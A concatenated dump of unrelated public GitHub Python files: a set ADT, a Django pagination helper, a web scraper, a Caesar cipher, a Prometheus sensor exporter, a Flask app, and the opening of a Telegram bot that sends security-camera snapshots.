self._size = size\n self._items = [init] * self._size\n\n def __len__(self):\n return self._size\n\n def __getitem__(self, index):\n return self._items[index]\n\n def __setitem__(self, index, value):\n self._items[index] = value\n\n def clear(self, value=None):\n for i in range(len(self._items)):\n self._items[i] = value\n\n def __iter__(self):\n for item in self._items:\n yield item\n\n\nclass Slot(object):\n def __init__(self, key, value):\n self.key = key\n self.value = value\n\n\nclass HashTable(object):\n UNUSERD = None\n EMPTY = Slot(None, None)\n\n def __init__(self):\n self._table = Array(8, init=HashTable.UNUSERD)\n self.length = 0\n\n @property\n def _load_factor(self):\n return self.length / float(len(self._table))\n\n def __len__(self):\n return self.length\n\n def _hash(self, key):\n return abs(hash(key)) % len(self._table)\n\n def _find_key(self, key):\n index = self._hash(key)\n _len = len(self._table)\n while self._table[index] is not HashTable.UNUSERD:\n if self._table[index] is HashTable.EMPTY:\n index = (index * 5 + 1) % _len\n continue\n elif self._table[index].key == key:\n return index\n else:\n index = (index * 5 + 1) % _len\n return None\n\n def _slot_can_insert(self, index):\n return (self._table[index] is HashTable.EMPTY or\n self._table[index] is HashTable.UNUSERD)\n\n def _find_slot_for_insert(self, key):\n index = self._hash(key)\n _len = len(self._table)\n while not self._slot_can_insert(index):\n index = (index * 5 + 1) % _len\n return index\n\n def __contains__(self, key):\n index = self._find_key(key)\n return index is not None\n\n def add(self, key, value):\n if key in self:\n index = self._find_key(key)\n self._table[index].value = value\n return False\n else:\n index = self._find_slot_for_insert(key)\n self._table[index] = Slot(key, value)\n self.length += 1\n if self._load_factor >= 0.8:\n self._rehash()\n return True\n\n def _rehash(self):\n old_table = self._table\n newsize = len(self._table) * 2\n self._table = Array(newsize, init=HashTable.UNUSERD)\n self.length = 0\n\n for slot in old_table:\n if slot is not HashTable.UNUSERD and slot is not HashTable.EMPTY:\n index = self._find_slot_for_insert(slot.key)\n self._table[index] = slot\n self.length += 1\n\n def get(self, key, default=None):\n index = self._find_key(key)\n if index is None:\n return default\n else:\n return self._table[index].value\n\n def remove(self, key):\n index = self._find_key(key)\n if index is None:\n raise KeyError()\n value = self._table[index].value\n self.length -= 1\n self._table[index] = HashTable.EMPTY\n return value\n\n def __iter__(self):\n for slot in self._table:\n if slot not in (HashTable.UNUSERD, HashTable.EMPTY):\n yield slot.key\n\n\nclass SetADT(HashTable):\n\n def add(self, key):\n return super(SetADT, self).add(key, True)\n\n def __and__(self, other_set):\n new_set = SetADT()\n for element_a in self:\n if element_a in other_set:\n new_set.add(element_a)\n return new_set\n\n def __sub__(self, other_set):\n new_set = SetADT()\n for element_a in self:\n if element_a not in other_set:\n new_set.add(element_a)\n return new_set\n\n def __or__(self, other_set):\n new_set = SetADT()\n for element_a in self:\n new_set.add(element_a)\n for element_b in other_set:\n new_set.add(element_b)\n return new_set\n\n def __xor__(self, other_set):\n new_set = SetADT()\n for element_a in self:\n if element_a not in other_set:\n new_set.add(element_a)\n\n for element_b in other_set:\n if element_b not in self:\n new_set.add(element_b)\n return new_set\n\n\ndef test_set_adt():\n s = SetADT()\n s.add(1)\n s.add(2)\n s.add(3)\n s.add(1)\n print(list(s))\n ss = SetADT()\n ss.add(4)\n ss.add(2)\n print(list(ss))\n print(list(s & ss))\n print(list(s - ss))\n print(list(s | ss))\n print(list(s ^ ss))\n\ntest_set_adt()","repo_name":"Frankssss/DataStructure-Algorithm","sub_path":"SetADT.py","file_name":"SetADT.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73411393106","text":"import json\nfrom django.http import HttpResponse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\ndef pagination(request, item, items_per_page):\n p = Paginator(item, items_per_page)\n page = request.GET.get('p')\n try:\n page = p.page(page)\n except PageNotAnInteger:\n page = p.page(1)\n except EmptyPage:\n page = None\n\n if request.GET.get('json'):\n data = []\n if page is not None:\n for i in page.object_list:\n item = {\n 'id': i.id,\n 'title': i.title,\n 'get_excerpt': i.get_excerpt(),\n 'get_absolute_url': i.get_absolute_url(),\n 'date': i.date.strftime(\"%d.%m.%Y\"),\n 'viewed': i.viewed,\n 'preview_image': i.get_preview_thumb()\n }\n data.append(item)\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n\n return page\n","repo_name":"ihormaslov/tips_diary","sub_path":"blog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22111247100","text":"import torch.optim as optim\nfrom ray import tune\n\n\ndef train_mnist(config):\n # train_loader, test_loader = get_data_loaders()\n # model = ConvNet()\n # optimizer = optim.SGD(model.parameters(), lr=config[\"lr\"])\n # for i in range(10):\n # train(model, optimizer, train_loader)\n # acc = test(model, test_loader)\n tune.track.log(mean_accuracy=0.5)\n print(config)\n\n\nanalysis = tune.run(\n train_mnist, config={\"lr\": tune.grid_search([0.001, 0.01, 0.1])})\n\nprint(\"Best config: \", analysis.get_best_config(metric=\"mean_accuracy\"))\n\n# Get a dataframe for analyzing trial results.\ndf = analysis.dataframe()\nprint(df)\n","repo_name":"ADGEfficiency/teaching-monolith","sub_path":"distributed-computing/ray/ray_tune.py","file_name":"ray_tune.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"48"} +{"seq_id":"16980720245","text":"import random as rand\nimport inspect\nfrom .models import Story as StoryTable\n\nclass Story:\n\n thisStory = None\n pk = None\n Story_text = None\n\n def __init__(self,PK):\n print(\"-----A Story object with pk %d was created-----\" % PK)\n\n global thisStory\n global pk\n\n pk = PK\n thisStory = StoryTable.objects.get(pk=pk)\n\n def getStoryArray(self):\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n if(pk == -1):\n print(\"Feature coming soon. Please give a PK for the story you want\")\n\n return thisStory.story_array\n\n def parseStoryText(self):\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n if(pk == -1):\n print(\"Feature coming soon. Please give a PK for the story you want\")\n\n storyInfo = thisStory.story_name + \"^\" + Story_text\n return storyInfo\n\n def injectWords(self,userInput):\n\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n global Story_text\n storyIndex = 0\n inputIndex = 0\n\n splitStory = thisStory.story_text.split('$')\n storyArray = thisStory.story_array.split(',')\n userInput = userInput.split(',')\n\n for token in splitStory:\n\n if (token == storyArray[inputIndex]):\n\n splitStory[storyIndex] = userInput[inputIndex]\n inputIndex = inputIndex + 1\n storyIndex = storyIndex + 1\n if(inputIndex == len(storyArray)):\n break\n\n storyIndex = 0\n inputIndex = 0\n finalStory = \"\"\n finalStory = finalStory.join(splitStory)\n\n Story_text = finalStory\n return finalStory\n\n def getPK(self):\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n return pk\n\n def setPK(PK):\n print(\"-----%s was called-----\" % inspect.stack()[0][3])\n global pk\n pk = PK\n return\n","repo_name":"janroddy/mad_lads","sub_path":"MadLads/MadLadParser/Story.py","file_name":"Story.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38905282793","text":"from datetime import timedelta\n\nfrom main import parse_date, module_deadline\nimport mc_submit\n\nclass CW_submission:\n def __init__(self, student_id,fullname, module_name, submission_date):\n self.student_id = student_id\n self.fullname = fullname\n self.module_name = module_name\n self.submission_date = submission_date\n\ndef submit():\n student_id_str = input(\"Enter Student ID: \")\n\n if not student_id_str.isnumeric():\n return None\n student_id = int(student_id_str)\n\n #get full name\n fullname = input(\"Enter Full Name: \")\n\n #get module name and validate\n module_name = input(\"Enter Module Name (CSF, IMOB, WT, ISDS): \")\n if not module_name.upper() in module_deadline.keys():\n return None\n\n #get submission date and validate\n str_date = input(\"Enter the date you are submitting the coursework.\"\n \"\\n(dd.mm.YYYY): \")\n if str_date == \"\" or str_date.isalpha():\n return None\n try:\n sub_date = parse_date(str_date)\n except:\n print(\"Enter in this format ===> (dd.mm.YYYY)\")\n return None\n\n #append to the list of submissions\n new_submission = CW_submission(student_id, fullname, module_name, sub_date)\n return new_submission\n\n\ndef check(cw_submission):\n deadline = module_deadline.get(cw_submission.module_name.upper())\n submission_date = cw_submission.submission_date\n if deadline < submission_date:\n #On time -> No\n if submission_date - deadline <= timedelta(days=1):\n #Within 24 hours?\n within_24hours(cw_submission)\n\n #Within 5days -> Yes\n elif submission_date - deadline <= timedelta(days=5):\n within_5days(cw_submission)\n\n else:\n #Within 5 days -> No\n after_5days(cw_submission)\n\n elif deadline >= submission_date:\n #On time -> Yes\n full_mark()\n\n#function for printing full mark\ndef full_mark():\n print(\"Your score is full mark of your assignment. No penalty\")\n\n#fucntion to subtract 10\ndef minus_10marks():\n print(\"Minus 10 marks from overall mark but not below 40\")\n\n#function to make mark 0\ndef mark_zero():\n print(\"Mark: 0\")\n\n#function to handle submissions within one day\ndef within_24hours(cw_submission):\n if check_valid_reason():\n mc_success = mc_submit.check(cw_submission)\n if mc_success:\n full_mark()\n else:\n minus_10marks()\n else:\n minus_10marks()\n\n#function to handle cases within 5 days\ndef within_5days(cw_submission):\n if check_valid_reason():\n mc_success = mc_submit.check(cw_submission)\n if mc_success:\n full_mark()\n else:\n mark_zero()\n else:\n mark_zero()\n\n#function to handle submissions after 5 days\ndef after_5days(cw_submission):\n if check_valid_reason():\n mc_success = mc_submit.check(cw_submission)\n if mc_success:\n print(\"Deferral Reassessment\")\n else:\n mark_zero()\n\n#to check valid reason\ndef check_valid_reason():\n while True:\n print(\"Is there a valid reason?\")\n answer = input(\"Yes/No\\n\")\n if answer.upper() == \"YES\":\n return True\n elif answer.upper() == \"NO\":\n return False\n else:\n print(\"Wrong Input. Type Yes or No!\")","repo_name":"westminster-bis/cw1-00012025","sub_path":"cw_submission.py","file_name":"cw_submission.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39396482326","text":"TILE_SIZE = 32\nFPS = 60\nWINDOW_WIDTH = 32 * TILE_SIZE\nWINDOW_HEIGHT = 16 * TILE_SIZE\n\nLEFT = -1\nRIGHT = 1\n\nPLAYER_GRAVITY = 2\nPLAYER_WIDTH = 32\nPLAYER_HEIGHT = 64\nPLAYER_JUMP_STRENGTH = 20\nPLAYER_SPEED = 5\nPLAYER_HEALTH = 100\n\n\nMAX_FALLING_SPEED = 10\n\nSPRITES_PATH = \"src/Assets/images/\"\nLEVELS_PATH = \"src/Assets/levels/lvl\"\n\nLEVEL_WIDTH = 128 * TILE_SIZE\nLEVEL_HEIGHT = 16 * TILE_SIZE\nSTARTING_POS = (2*TILE_SIZE, WINDOW_HEIGHT - 2*TILE_SIZE)\n\n","repo_name":"nwroblewski/python-game","sub_path":"src/Assets/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"35693947411","text":"from scrapy import Request\nfrom scrapy import Spider\nfrom scrapy.selector import Selector\nfrom scrapy import FormRequest\nfrom crawler.items import LaptopTCCItem\n# from selenium.webdriver.chrome.service import Service as ChromeService\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.select import Select\n# from selenium.webdriver.chrome.webdriver import WebDriver as ChromeDriver\n# from webdriver_manager.chrome import ChromeDriverManager\n\nimport datetime\nimport uuid\nimport json\naa=1\n\n#
    \n\t\n\nclass CrawlerSpider(Spider):\n name = \"laptoptcc\"\n allowed_domains = [\"laptoptcc.com\"]\n start_urls = [\n \"https://laptoptcc.com/danh-muc/laptop/\",\n ]\n def __init__(self):\n options = Options()\n options.headless = True\n\n self.driver = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver_linux64',options=options)\n\n\n\n\n def parse(self, response):\n print(response.url)\n i=1\n links= Selector(response).xpath('//*[@id=\"main\"]/ul[contains(@class, \"products\")]/li/div/div/div[@class=\"product-loop-header\"]/a/@href')\n for link in links:\n print(i)\n i=i+1\n yield Request(url=link.get(), callback=self.parse_laptop)\n \n \n next_page = Selector(response).xpath(' //*[@id=\"main\"]/div[@class=\"shop-control-bar-bottom\"]/nav/ul/li/a[@class=\"next page-numbers\"]/@href').extract_first()\n print(\"*********\")\n print(len(links))\n print(next_page)\n print(\"************\")\n if next_page is not None:\n print(next_page)\n yield Request(next_page, callback=self.parse)\n # yield Request(url=\"https://laptoptcc.com/cua-hang/laptop-hp-elitebook-840-g5-i5-8350u-8gb-256gb-14-fhd/\", callback=self.parse_laptop)\n\n\n def parse_laptop(self, response):\n print(\"**************crawling \"+response.url+\"***********\")\n\n URL=response.url\n \n \n Name = Selector(response).xpath('//*[@id=\"content\"]/div[@class=\"container\"]/div[@class=\"site-content-inner\"]\\\n /div[@class=\"bg-wrapper\"]/div[@class=\"product-detail\"]/div[contains(@class,\"product\")]\\\n /div/div[@class=\"col-md-9\"]/div/h1[@class=\"product_title entry-title\"]/text()').get()\n \n self.driver.get(response.url)\n element = WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.ID, \"cau-hinh\"))\n )\n\n # options = self.driver.find_elements(By.XPATH, '//*[@id=\"cau-hinh\"]/option[contains(@class,\"attached\")]')\n wait = WebDriverWait(self.driver, 10)\n wait.until(EC.presence_of_element_located((By.XPATH, '//ul[@class=\"variable-items-wrapper button-variable-wrapper reselect-clear\"]/li')))\n li_tags = self.driver.find_elements(By.XPATH,'//ul[@class=\"variable-items-wrapper button-variable-wrapper reselect-clear\"]/li')\n\n for i in range(len(li_tags)):\n li = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.XPATH, f'//ul[@class=\"variable-items-wrapper button-variable-wrapper reselect-clear\"]/li[{i+1}]')))\n li.click()\n \n # self.driver.execute_script(\"arguments[0].setAttribute('aria-checked', 'true')\", li)\n wait = WebDriverWait(self.driver, 5)\n # html = self.driver.page_source\n # response = Selector(text=html)\n \n item = LaptopTCCItem()\n item['Name']= Name\n item['URL'] = URL \n item['Price'] = li.find_element(By.CLASS_NAME,\"price-mini\").text\n \n item['Ram'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"Ram\")]').text\n item['Storage'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"Ổ cứng\")]').text\n item['Display'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"Màn hình\")]').text\n item['Graphics'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"VGA\")]').text\n item['Status'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"Tình trạng\")]').text\n item['CPU'] = self.driver.find_element(By.XPATH,'/html/body/div[2]/div/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div/div[2]/form/div[1]/div/div[2]/p/span[contains(b/text(), \"CPU\")]').text\n # self.driver.execute_script(\"arguments[0].setAttribute('aria-checked', 'false')\", li)\n yield item\n\n\n def closed(self, reason):\n # Close the browser when the spider is done\n self.driver.quit() \n\n\n ","repo_name":"tranvietcuonghust/Laptop_Data_Integration","sub_path":"Scrapper/crawler/crawler/spiders/laptoptcc.py","file_name":"laptoptcc.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11516458835","text":"from datetime import datetime\n\n# How many days the video should cover. 1 <= days <= 28,\n# unless more files are downloaded.\ndays = 1\n\n\ndef main(urd):\n\n\t# Load background map from OpenStreetMap\n\ttiles = urd.build('osmtiles',\n\t\tlat=40.564, lon=-74.013,\n\t\tdeltalat=0.30, deltalon=0.20, zoom=12,\n\t\tcrop=((162, 103, 962, 1183)),\n\t\tresize=(667, 900),\n\t)\n\ttiles.link_result('map.png')\n\n\t# Import NYC COVID-19 statistics\n\tcases = urd.build('csvimport', filename='case-hosp-death.csv')\n\tcases = urd.build('dataset_type', source=cases, column2type=dict(\n\t\tDATE_OF_INTEREST='date:%m/%d/%Y',\n\t\tCASE_COUNT='number',\n\t))\n\tcases = urd.build('covidcases', source=cases)\n\n\t# Import and process zone polygons\n\tzones = urd.build('taxizones', filename='zones.json', tiles=tiles)\n\n\t# Create moving average for previous and current year\n\tma = []\n\tfor name, mindate, maxdate in (\n\t\t\t# offset in 2019/2020 dates since we want to compare mondays to mondays etc\n\t\t\t('previous', datetime(2019, 3, 3), datetime(2019, 3, 3 + days)),\n\t\t\t('current', datetime(2020, 3, 1), datetime(2020, 3, 1 + days))):\n\t\timpo = urd.peek('nyc', mindate.strftime('%Y-%m')).joblist.get(-1)\n\t\tprint('Input dataset is \"%s\"' % (impo,))\n\t\timp = urd.build('dataset_filter_columns', keep_columns=('stopdate10m', 'DOLocationID'), source=impo)\n\t\timp = urd.build('dataset_hashpart', hashlabel='stopdate10m', source=imp, length=1)\n\t\timp = urd.build('aggregate', source=imp, mindate=mindate, maxdate=maxdate)\n\t\tjob = urd.build('movingaverage', source=imp, Nbins=6, name=name + '_ma')\n\t\tma.append(job)\n\tjl = urd.joblist\n\ttrend = urd.build('tripratio', left=jl.get('previous_ma'), right=jl.get('current_ma'))\n\t# render all this data into images and then into a movie\n\tjob = urd.build('render', trend=trend, cases=cases, zones=zones, map_bg=tiles, ma=ma)\n\tjob = urd.build('frames2mp4', source=job, framesname='frames_inorder/frame_%05d.jpg', framerate=60)\n\tjob.link_result('out.mp4')\n\n\t# print(jl.print_exectimes())\n","repo_name":"exaxorg/pycon20-nyc-taxi-covid-movie","sub_path":"dev/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73243922067","text":"# Задача 1. \n \n\n# ingredient = {'Эспрессо': [1, 0, 0], 'Капучино': [1, 3, 0],\n# 'Маккиато': [2, 1, 0], 'Кофе по-венски': [1, 0, 2],\n# 'Латте Маккиато': [1, 2, 1], 'Кон Панна': [1, 0, 1]}\n \n \n# def choose_coffee(preferences):\n# for i in preferences:\n# if ingredient[i][0] <= ingredients[0] and ingredient[i][1] <= ingredients[1] \\\n# and ingredient[i][2] <= ingredients[2]:\n# ingredients[0] -= ingredient[i][0]\n# ingredients[1] -= ingredient[i][1]\n# ingredients[2] -= ingredient[i][2]\n# return i\n# return 'К сожалению, не можем предложить Вам напиток'\n\n \n# ingredients = []\n# ingredients = [1, 2, 3]\n# print(choose_coffee(\"Эспрессо, Капучино, Маккиато, Кофе по-венски, Латте Маккиато, Кон Панна\".split(\", \")))\n# print(choose_coffee(\"Эспрессо, Капучино, Маккиато, Кофе по-венски, Латте Маккиато, Кон Панна\".split(\", \")))\n\n# ingredients = [4, 4, 0]\n# print(choose_coffee(\"Капучино, Маккиато, Эспрессо\".split(\", \")))\n# print(choose_coffee(\"Капучино, Маккиато, Эспрессо\".split(\", \")))\n# print(choose_coffee(\"Капучино, Маккиато, Эспрессо\".split(\", \")))\n\n\n#Задача 2. \n\nsmall_symbols = \"абвгдеёжзийклмнопрстуфхцчшщъыьэюя\"\nbig_symbols = \"АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\"\n\n\ndef shift(text, symbols, n):\n index = symbols.find(text)\n if index + n < len(symbols):\n return symbols[index + n]\n else:\n return symbols[(index + n) % len(symbols)]\n\n \n\ndef back_shift(text, symbols, n):\n index = symbols.find(text)\n if index - n >= 0:\n return symbols[index - n]\n else: \n return symbols[(index - n) % len(symbols)]\n\n \n\ndef encrypt(text, n = 3):\n res = \"\"\n\n for i in range(0, len(text)): \n if text[i].isupper():\n res += shift(text[i], big_symbols, n)\n \n elif text[i].islower():\n res += shift(text[i], small_symbols, n)\n else:\n res += text[i]\n \n return res\n\n\ndef decrypt (text, n = 3):\n res = \"\"\n \n for i in range(0, len(text)):\n if text[i].isupper():\n res += back_shift(text[i], big_symbols, n)\n \n elif text[i].islower():\n res += back_shift(text[i], small_symbols, n)\n else:\n res += text[i]\n \n return res\n\n\n\nstr = encrypt(input())\nprint(str)\nprint(decrypt(str))","repo_name":"dmitrij77766/Python_homework8","sub_path":"Homework8.py","file_name":"Homework8.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24177083716","text":"#!/usr/bin/python\n\nimport argparse\n\nfrom wsgiref.simple_server import make_server\n\nfrom prometheus_client import make_wsgi_app, Metric, REGISTRY\n\nfrom Adafruit.Adafruit_BMP085 import BMP085\n\n\nPORT = 9091\n\n\nclass BMP180Collector():\n\n def collect(self):\n bmp = BMP085(0x77)\n temp = bmp.readTemperature()\n pressure = bmp.readPressure()\n\n temp_metric = Metric('bmp180_temp', 'BMP180 temperature', 'gauge')\n temp_metric.add_sample('bmp180_temp', value=temp, labels={})\n yield temp_metric\n\n pressure_metric = Metric('bmp180_pressure', 'BMP180 pressure', 'gauge')\n pressure_metric.add_sample('bmp180_pressure', value=pressure, labels={})\n yield pressure_metric\n\n\ndef main():\n parser = argparse.ArgumentParser(description='BMP180 exporter for Prometheus')\n parser.add_argument('-p', '--port', help=f'exporter exposed port (default {PORT})', type=int, default=PORT)\n args = parser.parse_args()\n\n REGISTRY.register(BMP180Collector())\n\n app = make_wsgi_app()\n httpd = make_server('', args.port, app)\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jelly/prometheus-bmp180-exporter","sub_path":"prometheus-bmp180-exporter.py","file_name":"prometheus-bmp180-exporter.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2755249882","text":"#! /usr/bin/python3\nimport sys\n\n\ndef safe_tiles(row0, height):\n width = len(row0)\n traps = {x for (x, cell) in enumerate(row0) if cell == '^'}\n safe = width - len(traps)\n for y in range(1, height):\n traps = {x for x in range(width)\n if len(traps & {x - 1, x + 1}) == 1}\n safe += width - len(traps)\n return safe\n\n\ndef main(input_file):\n row0 = open(input_file).read().strip()\n print(\"Part 1:\", safe_tiles(row0, 40))\n print(\"Part 1:\", safe_tiles(row0, 400000))\n\n\nif __name__ == '__main__':\n main(sys.argv[1])\n","repo_name":"davearussell/advent2016","sub_path":"day18/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9824039957","text":"def merge_sort(nums_list=[]):\n\n if len(nums_list) <= 1:\n return nums_list\n\n half_of_list = round(len(nums_list) / 2)\n left_list = nums_list[:half_of_list]\n right_list = nums_list[half_of_list:]\n\n def _merge(left_list, right_list):\n left_cursor = 0\n right_cursor = 0\n result_list = []\n while(left_cursor < len(left_list) and right_cursor < len(right_list)):\n if left_list[left_cursor] > right_list[right_cursor]:\n result_list.append(right_list[right_cursor])\n right_cursor += 1\n else:\n result_list.append(left_list[left_cursor])\n left_cursor += 1\n return result_list + left_list[left_cursor:] + right_list[right_cursor:]\n\n return _merge(merge_sort(left_list), merge_sort(right_list))\n\n\nif __name__ == \"__main__\":\n # test lists\n nums_list = [4, 3, 6, 1, 7, 2, 9, 0, 8, 5, 0]\n # nums_list = [4, 3, 6, 1, 7]\n sorted_list = merge_sort(nums_list)\n print(sorted_list)\n","repo_name":"vanyakulinich/algorithms","sub_path":"algorithms/mergeSort/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36706807670","text":"from flask import Flask, render_template\n\napp = Flask(__name__,\n static_url_path=\"\",\n static_folder=\"static\",\n template_folder=\"templates\"\n )\n\n@app.route(\"/\")\ndef home():\n return render_template('index.html')\n\n@app.errorhandler(400)\ndef error404(err):\n\te = {\n\t\t'number':'400',\n\t\t'description':'The request that this page has received is not valid. Perhaps your browser has been confused or you are using the wrong method access to this page.' \n\t}\n\treturn render_template('error.html', title='404', error=e), 400\n\n@app.errorhandler(401)\ndef error404(err):\n\te = {\n\t\t'number':'401',\n\t\t'description':'We are sorry, but you do not have authorization to access this page.' \n\t}\n\treturn render_template('error.html', title='404', error=e), 401\n\n@app.errorhandler(403)\ndef error404(err):\n\te = {\n\t\t'number':'403',\n\t\t'description':'We are sorry but access to this page is prohibited. Contact an administrator to grant you access.' \n\t}\n\treturn render_template('error.html', title='404', error=e), 403\n\n@app.errorhandler(404)\ndef error404(err):\n\te = {\n\t\t'number':'404',\n\t\t'description':'We could not find the page you are looking for, perhaps you have misspelled the link or the page is private.' \n\t}\n\treturn render_template('error.html', title='404', error=e), 404\n\n@app.errorhandler(500)\ndef error404(err):\n\te = {\n\t\t'number':'500',\n\t\t'description':'Do not worry, this error is not your fault. There has been an internal error on our server. We are trying to fix it.' \n\t}\n\treturn render_template('error.html', title='404', error=e), 500\n\nif __name__ == \"__main__\":\n # Importante desactivar esto en producción\n app.run(debug=True)\n","repo_name":"pythonmurcia/gitcollab","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"25946751181","text":"#!/usr/bin/python3\nimport sys\n\n\ndef safe_function(fct, *args):\n from sys import stderr\n try:\n ans = fct(*args)\n return (ans)\n except (TypeError, ZeroDivisionError, IndexError):\n print(\"Exception: {}\".format(sys.exc_info()[1]), file=stderr)\n return (None)\n","repo_name":"davidajimati/alx-higher_level_programming","sub_path":"0x05-python-exceptions/101-safe_function.py","file_name":"101-safe_function.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34815388109","text":"def get_grade(s1, s2, s3):\n av = s1+s2+s3\n average = av/3\n if 90<=average<=100:\n return \"A\"\n elif 80 <= average < 90:\n return \"B\"\n elif 70 <= average < 80:\n return \"C\"\n elif 60 <= average < 70:\n return \"D\"\n elif 0 <= average < 60:\n return \"F\"\n\nprint(get_grade(90,90,80))","repo_name":"mutheud/calculator","sub_path":"average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16451045795","text":"import os\nimport subprocess\n\nfrom setuptools import find_packages, setup\nfrom torch.utils.cpp_extension import BuildExtension, CUDAExtension\n\ndef make_cuda_ext(name, module, sources):\n cuda_ext = CUDAExtension(\n name='%s.%s' % (module, name),\n sources=[os.path.join(*module.split('.'), src) for src in sources]\n )\n return cuda_ext\n \nif __name__ == '__main__':\n setup(\n cmdclass={'build_ext': BuildExtension},\n ext_modules=[\n make_cuda_ext(\n name='iou3d_nms_cuda',\n module='iou3d_nms',\n sources=[\n 'src/iou3d_cpu.cpp',\n 'src/iou3d_nms_api.cpp',\n 'src/iou3d_nms.cpp',\n 'src/iou3d_nms_kernel.cu',\n ]\n ),],)\n","repo_name":"mariya12290/VoxelNet_Multilabel_MasterThesis","sub_path":"model/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"20833666425","text":"import sys\nimport os\nimport telepot\nimport datetime\nimport time\nimport urllib3\nimport io\nimport configparser\nfrom PIL import Image\nimport requests\nfrom io import BytesIO as ioBytes\nimport traceback\n\n\"\"\"\nCtrl-C per uscire.\n\"\"\"\n\nhttp = urllib3.PoolManager\nconfigParser = configparser.RawConfigParser()\nconfigFilePath = r'./cameras.conf'\nconfigParser.read(configFilePath)\n\ncameraList = configParser['CAMERAS']\ncommandList = configParser['ZM_COMMANDS']\nauthorizedChatIds = configParser['TELEGRAM_AUTHORIZED_CHAT_IDS']['IDS']\nbotToken = configParser['TELEGRAM_BOT_TOKEN']['AUTH_TOKEN']\nadminChatIds = configParser['TELEGRAM_ADMIN_CHAT_IDS']['IDS']\n\n\ndef handle(msg):\n chat_id = msg['chat']['id']\n command = msg['text']\n sender = str(msg['from']['id'])\n noermalizedCommand = command.upper()\n\n print('Got command: %s' % command)\n\n if sender in authorizedChatIds:\n if noermalizedCommand in cameraList:\n print(\"Ricevuto come Camera\")\n url = cameraList[command]\n try:\n response = requests.get(url)\n bot.sendPhoto(chat_id=chat_id,\n photo=io.BytesIO(response.content))\n except:\n traceback.print_exc()\n bot.sendMessage(\n chat_id, 'Impossibile collegarsi a telecamera ' + command)\n elif noermalizedCommand in commandList:\n print(\"Ricevuto come Azione\")\n cmd = commandList[noermalizedCommand]\n res = os.popen(cmd).read()\n message = os.popen(\n \"sudo service zoneminder status | head -3 | tail -1 | cut -f2 -d'(' | cut -f1 -d')'\").read()\n bot.sendMessage(chat_id, message)\n\n elif sender in adminChatIds and len(command) > 1 